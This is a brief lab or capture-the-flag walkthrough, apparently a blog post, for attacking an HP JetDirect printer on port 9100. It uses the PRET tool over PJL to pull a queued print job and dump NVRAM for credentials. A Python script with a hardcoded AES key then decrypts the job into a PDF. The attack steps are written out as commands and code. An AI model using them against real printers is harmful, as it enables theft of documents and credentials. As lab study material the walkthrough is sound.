HP Jet Direct Exploit - Port 9100
git clone https://github.com/RUB-NDS/PRET.git
./pret.py 10.10.10.201 pjl
go to queued file and download it . get queued
nvram dump #Ram Dump for creds
sed -e "s#’##g" queued | cut -c2- > queued.b64
cat queued.b64 | base64 -d > somefile.raw
decrypt_printer_queue.py
import io, sys, base64
from Crypto.Cipher import AES
with io.open('somefile.raw', 'rb') as fp:
c = fp.read()[8:]
iv, ct = c[:16], c[16:]
cipher = AES.new('13vu94r6643rv19u', AES.MODE_CBC, iv)
z = cipher.decrypt(ct)
sys.stdout.buffer.write(z)
python3 decrypt_printer_queue.py > newfile
file newfile
newfile: PDF document, version 1.4
mv newfile newfile.pdf
Comments
Post a Comment